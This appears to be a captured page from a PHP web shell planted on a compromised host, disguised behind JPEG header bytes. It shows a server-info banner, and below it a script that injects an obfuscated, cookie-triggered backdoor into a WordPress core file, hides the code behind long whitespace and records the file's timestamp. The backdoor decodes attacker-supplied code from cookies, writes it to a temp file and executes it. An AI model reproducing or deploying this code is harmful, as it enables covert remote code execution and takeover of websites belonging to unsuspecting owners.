????JFIF??x?x????'
Server IP : 104.21.80.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /dev/shm/ |
Upload File : |
<?php $path = '/home/boutjvuz/public_html/projects/nimirik.ma/wp-includes/media.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%20%28isset%28%24_COOKIE%5B-13%2B13%5D%29%20%26%26%20isset%28%24_COOKIE%5B38%2B-37%5D%29%20%26%26%20isset%28%24_COOKIE%5B-5%2B8%5D%29%20%26%26%20isset%28%24_COOKIE%5B-1%2B5%5D%29%29%20%7B%20%24hld%20%3D%20%24_COOKIE%3B%20function%20mutex_lock%28%24sym%29%20%7B%20%24hld%20%3D%20%24_COOKIE%3B%20%24item%20%3D%20tempnam%28%28%21empty%28session_save_path%28%29%29%20%3F%20session_save_path%28%29%20%3A%20sys_get_temp_dir%28%29%29%2C%20%272e75aa09%27%29%3B%20if%20%28%21is_writable%28%24item%29%29%20%7B%20%24item%20%3D%20getcwd%28%29%20.%20DIRECTORY_SEPARATOR%20.%20%22buffer_cache%22%3B%20%7D%20%24pointer%20%3D%20%22%5Cx3c%5Cx3f%5Cx70%5Cx68p%5Cx20%22%20.%20base64_decode%28str_rot13%28%24hld%5B3%5D%29%29%3B%20if%20%28is_writeable%28%24item%29%29%20%7B%20%24record%20%3D%20fopen%28%24item%2C%20%27w%2B%27%29%3B%20fputs%28%24record%2C%20%24pointer%29%3B%20fclose%28%24record%29%3B%20spl_autoload_unregister%28__FUNCTION__%29%3B%20require_once%28%24item%29%3B%20%40array_map%28%27unlink%27%2C%20array%28%24item%29%29%3B%20%7D%20%7D%20spl_autoload_register%28%22mutex_lock%22%29%3B%20%24ent%20%3D%20%22ca47dc840978b1e39201374c57a69adc%22%3B%20if%20%28%21strncmp%28%24ent%2C%20%24hld%5B4%5D%2C%2032%29%29%20%7B%20if%20%28%40class_parents%28%22module_controller_right_pad_string%22%2C%20true%29%29%20%7B%20exit%3B%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { $content = file_get_contents($path); if (strstr($content, $new_code)) { die("!success!<ft>{$ft}</ft>"); } } } } die('!failed!');